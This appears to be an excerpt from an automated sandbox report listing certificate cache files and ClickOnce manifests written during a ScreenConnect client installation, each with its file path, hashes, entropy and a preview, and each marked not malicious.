                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                        Entropy (8bit):7.5952943825561885
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:5onfZQc5RlRtBfQGQyshVBh/kZGxCBRrc9QrBI+cM7bu5rDZle7ux3cvUtlWxqhv:5iKcdZt/aBh/kMCBRIarzdCtDZQKZtl3
                                                                                                                                                                                                                                        MD5:B08918317EA257B3B5CB86118FD1E0BA
                                                                                                                                                                                                                                        SHA1:DF74C3081C3913A2F72A8AF3F85368014AB9C871
                                                                                                                                                                                                                                        SHA-256:6B64B8DE35BD5DF96151494399C40BC6CC970FF598F8771A0BC6F7151D1BD42E
                                                                                                                                                                                                                                        SHA-512:452D83747C11A0F6062F66D14C1C2051A4C7DAFA99F970E1A23D48A6A2935283D54242ED9800C9925E0C5429611EF705AF664E3206B391033C592993A519BF69
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241219184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241219184215Z....20241226184215Z0...*.H.............!..tv~....~...S...hN..._m}..)w.Q<\.;.o@H.s^O.E...g.Pn....1....."..8p..z...L.$...2........gK..c.yJ...&.C]~q?..wT,.R..#....m.1cy.t.LU..l..0...F.JR..`.....J..3W=.?.vX....P.=..{.Yw....+...:......8..*h.S.-.............@.O....'.<.:$...Q.Y*.......1....b[..r....5i.T... .Y...7.N3....b..>.hb.<7.1.f..A}_......!.).h..........1..F*r....j.O..1.Ww)..=.....O..x$..e\i>l.t...Y...e.5.S~..=6..+..d....OKv..BH. n....q\/.j....%`..@.&u.Y!.8...;...7.'.......[J..;..0.x.....0....)....v,E.}.O..G.%\...gz.1Z...<\.`

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                        Entropy (8bit):3.4453558162034477
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKk8HG7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:cMLkPlE99SCQl2DUeXJlOA
                                                                                                                                                                                                                                        MD5:F455263A2886942D69F9F4E466ABF8F3
                                                                                                                                                                                                                                        SHA1:0E6BADE7E5B7A3C028E536E758CCA015D03A8FBE
                                                                                                                                                                                                                                        SHA-256:8322109A944CA1F63B56A9806E648139CD60D6990A54C67FD9523CE4B4D89015
                                                                                                                                                                                                                                        SHA-512:702AAD1A3ED20272CAA3B1BFE6E1AEB3CC91283703104AE31493B982D47F9BECB482B9E931805382C7A69427A421588D8CECD82320ED20C268466C8E0F3F1042
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... ............U..(................................................T..S.. ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                        Entropy (8bit):3.150184159866505
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKIi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:AdDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                        MD5:F9A8739C1637B182D7A77C1A2FFDE61C
                                                                                                                                                                                                                                        SHA1:F2847FF3AE718001E9197920FA901BED3674B472
                                                                                                                                                                                                                                        SHA-256:2CA6FF0A88AAAB5AD9364F94456A7AAE02476E8848045763D4966412F6E8B70F
                                                                                                                                                                                                                                        SHA-512:BCFCC1833380A7AB5F8F1F48D0B3A46C83FFCFAC8554ABEFF7C89A0B091768A0F7BFB73CADFC769E81F64EB83A2653025BAB3746B11F8DF5C0FEE42254421411
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... .........$.S..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                        Entropy (8bit):3.2115528011502117
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKiaNdzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:qaCtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                        MD5:CEA72D14567207AC925E41770A2F2950
                                                                                                                                                                                                                                        SHA1:CFEC3AC799718F4598F31C1A41BE7154EECDD0C1
                                                                                                                                                                                                                                        SHA-256:EBC776D7233EDD62655FF4C9CB3BD5B06666F64090933542177A1FBD8BEED23F
                                                                                                                                                                                                                                        SHA-512:A8C4A3ABE4854F89BA96A441B79A184AEE7C953211D3672D788E12C9D908F4F42E50FBFE9878106643D450B3ED1F34CFC2061B9928F4130CFAF3337F34A490C4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... ............S..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                        Entropy (8bit):3.9736165971053605
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:UOZ2ZUUmxMiv8sFBSfamB3rbFURMOlAkr:xEZUUmxxv7Sf13rbQJr
                                                                                                                                                                                                                                        MD5:2FECA7278805DE58366D3D08AF4D8FA5
                                                                                                                                                                                                                                        SHA1:977B92F27461ED707F79C3AE80A35D25B9626AF1
                                                                                                                                                                                                                                        SHA-256:C899E3994D135AA00F79E2B9C1899B758C76E854ECB2CE2E921B2E3B1B61C4EE
                                                                                                                                                                                                                                        SHA-512:D5D475F385DBC21A76E34DC1BB3683D98AD867A5F8A4F4B3D30440DA4ABA279B3C1AD69087FBE4726A99DE862EF166F1A08EA1C24D5B914148128A1FB0537708
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... ....(.......S..(.................%.ER...]...W...................]...W.. .........x.R.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                        Entropy (8bit):3.0185545231720012
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKia5LDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:V5LYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                        MD5:1FE8958CE1F8C4C07D5D57D30BC4E5FA
                                                                                                                                                                                                                                        SHA1:6C9A455F5E8AB229E0E790C0A446D00FCDA11D03
                                                                                                                                                                                                                                        SHA-256:ACD961F5811FB6C5BF4690D498C2E038B832882F74E01E5A8004B9F867290FE1
                                                                                                                                                                                                                                        SHA-512:7B73A2FC84A1E803738B705B42002C27C8B4D5377FF0151B70688A96922192287FE0E58295959090C4A8EBF14738BA8B6301C511CF9918C9068A319C5E3CBA9B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... ....l....PF.mS..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec.cdf-ms

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25496
                                                                                                                                                                                                                                        Entropy (8bit):5.591150282427365
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:CGqwEEtGQ6ARE1X9iv2buX9R/QPIBM7Yw9umpGg1UOi:CzC6P1X9HuX9R/QPI+0Agg1UOi
                                                                                                                                                                                                                                        MD5:AD2BD7E321F9600398138B98AFA04651
                                                                                                                                                                                                                                        SHA1:8A0FE7D3C6D2F53621CDA1264124A9EAFBDE26B9
                                                                                                                                                                                                                                        SHA-256:05707B4B61A6BA4656D204B51FA5EBC8A66BD9D2CE89BD8D3775A19F0FCFAA1E
                                                                                                                                                                                                                                        SHA-512:EC99AF9067035FB2C49B22591E8878887CEC4556CA4A59099691A7DE10E3C06F70627258B9D41209B8839BAF7D67EE794DE8A1C52469AB3F248D6BB0E65C144A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PcmH..........y`(.*&f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........]..*.........S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K......3LD.SN....u..IV..Q......D..R...[s.T..<U...O.&r..VzX.....E..X.[...........`.......=...O...S...V...Y...\.......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                        Entropy (8bit):5.955723401117127
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zeNAJBQ4aCaX/f68nEuX9/v2bTX9FX9R/QPIYM7Y7:z66buX9uTX9FX9R/QPIN07
                                                                                                                                                                                                                                        MD5:4739CCEA24F7615F4B5186F8DB9AA006
                                                                                                                                                                                                                                        SHA1:66161FDE108CD3C27770559B5408F08F0EFA0C64
                                                                                                                                                                                                                                        SHA-256:4C5AFFF7D1CED73D787E691D8F1E82D26E4BFF70E2D9001EF220D66C3BC2D041
                                                                                                                                                                                                                                        SHA-512:0EE5B62138BAFDF5252F304963C4F9F3A6D56E3F3C1C2CF209B284FFE5B3F4424BD09DC42F6EE79307258DE74BA0C326C81D0958402CA979602B95409D707900
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.4.2.9083" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.4.2.9083" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..core_4b14c015c87c1ad8_0018.0004_none_53e91df7fcfd4a60.cdf-ms

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3452
                                                                                                                                                                                                                                        Entropy (8bit):4.6805444379821415
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:c5WWW1eV+WwQXAmLw2HDuhzPOZCywZ5t3xhIYX:cPJD02HyFPOyZXf
                                                                                                                                                                                                                                        MD5:63B8E645DE07F536F45E682F163B016A
                                                                                                                                                                                                                                        SHA1:677ADB3BBA898DCEFFFDD911B0BD01B13C978882
                                                                                                                                                                                                                                        SHA-256:7D4CBBB0175517EB0C8B653C4C47A8F13AFC3899939D69D29F934859CA1E0543
                                                                                                                                                                                                                                        SHA-512:70BF47F5BAD04A6065ACF10677C55A57B64754A4948B05DD80A86EDF5E116C0EAE9D274EB0B63AF83C178829E83D5CF0D2A397DFFDD087A45B353779CA9356B7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PcmH......../.m,Uz.`#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........]..*.......'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................<...............................................<...............................................<...............................................<...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.4.2.9083%....................................................MdHd............D...........MdSp(...$...&...(...#.............n: urn:schemas

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..core_4b14c015c87c1ad8_0018.0004_none_53e91df7fcfd4a60.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                        Entropy (8bit):5.130383203139021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0A5vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A/GVETDTo
                                                                                                                                                                                                                                        MD5:AE2F030FA7A72B3B147D9699F326D545
                                                                                                                                                                                                                                        SHA1:A918B54C0AD8216B1E61D2C0BA35239B6BB5CB74
                                                                                                                                                                                                                                        SHA-256:0884F127D1A5260AC40B7CACEA51F9A994B4E3BEAB6E5C75E848CA3000FEADF9
                                                                                                                                                                                                                                        SHA-512:06857692C0283FA76512060E56D711E87B789A305B3720B0255AF920004DBFAC6C782FCD12E85771A918A2FFEDC55A3723F9D616D2A21F3042E158AC25889504
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..dows_4b14c015c87c1ad8_0018.0004_none_5860f5d9394b5d90.cdf-ms

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5256
                                                                                                                                                                                                                                        Entropy (8bit):4.020399196134929
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rdP+Rxl+heV+Ww7xkIeo2n4XOmBWzvngnsRA:4RxlnJdIO8OcWQZ
                                                                                                                                                                                                                                        MD5:3B1013E089AA9BFA6C3112C25197B394
                                                                                                                                                                                                                                        SHA1:2C9A3D8AA26AC8699E18C0EBBB4FCE6DA0719FD3
                                                                                                                                                                                                                                        SHA-256:6CB2A3034D0FC66F1F468AF2D02977A0FCEDC4111491374C1ADA4AF8362C5DAA
                                                                                                                                                                                                                                        SHA-512:1C785435376D05DD086724C8EB496F45E438DAED737FA20E321D396E64089BAF6FF4AEB628B10FBAFBEF87F7CD2068DE439E9F7D14F0563FBEE258FF716FFA76
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PcmH...........D.!.4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........]..*.......[.......................z..w.....[~31.X......E..X.....s".I...R....C.........y..&..d."....B(.....#...^.ie...u&...F.....Ey)....+.`...m,......;../............... ...$...'...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........h...@.......................................(...................$.......8...(...H.......p.......x...(...............................(.......................(... .......H.......P...(...`...................(.......................(...............d...........l...............................................<...............................................<...............................................<...............................................<.......................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..dows_4b14c015c87c1ad8_0018.0004_none_5860f5d9394b5d90.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                        Entropy (8bit):5.057000083875677
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0A1vSkcyMDcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AzHMDGQAXRTFgTo
                                                                                                                                                                                                                                        MD5:979E83C183434FDF0840E13A1BEB2200
                                                                                                                                                                                                                                        SHA1:5EF4A368EA8FF239AEACEFDD109F799F6EA58567
                                                                                                                                                                                                                                        SHA-256:50FE4C046184A3BE4A888C14564F56816BDD47AD3B7C580E0EF8B9FAF1101813
                                                                                                                                                                                                                                        SHA-512:316F0A82D8BE824D8146A69CCE201F5E4D959DB9C56EF85CA5D7BBDF79E19116F8C179CDC2B59ECEDE03B29B6E4EF695A0C792EE207E24295F7C87D1B5FD0428
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\manifests\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d.cdf-ms

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6584
                                                                                                                                                                                                                                        Entropy (8bit):3.9003708076808596
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:5vm9PPb/RPpeV+Www98WpJOJJQH2hM+OREQ/Oo3jn6qx/VT:CPPLRuJdpJYl8b9T6aT
                                                                                                                                                                                                                                        MD5:DC6821DAA725AE1B3CFE11A4F4C0246E
                                                                                                                                                                                                                                        SHA1:3A76CCE70DAEC40272B6A42B9077BEF0F64B5737
                                                                                                                                                                                                                                        SHA-256:09379EADA48242321C3CC27892DF38217BE1FA1D4CCC63726D8B21B37CCFBC36
